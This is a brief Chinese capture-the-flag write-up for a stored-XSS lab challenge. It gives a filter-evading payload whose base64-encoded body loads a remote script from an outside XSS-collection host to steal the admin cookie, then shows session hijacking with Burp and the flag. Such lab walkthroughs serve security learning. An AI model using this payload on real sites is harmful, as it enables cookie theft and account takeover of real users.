BUU XSS COURSE 1

启动靶机

有留言板和登录功能，很明显是存储性xss，通过留言功能插入xss代码，获取cookie登录背景
先测试过滤

查看源代码发现script被过滤
似乎只过滤了script

找一个xss平台大概本身用服务器担当cookie

1. '"><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vdWouY2kvbzExIjtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw== autofocus>

复制代码

项目上线
获取到了cookie  cookie : PHPSESSID=8339da05744002f0617d48b003ce9d59
和背景路径        http://web/backend/admin.php

用burp更换cookie登录背景

得到flag     flag{dbd806e6-ddb5-49e6-9648-c5a4676b2b66}

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。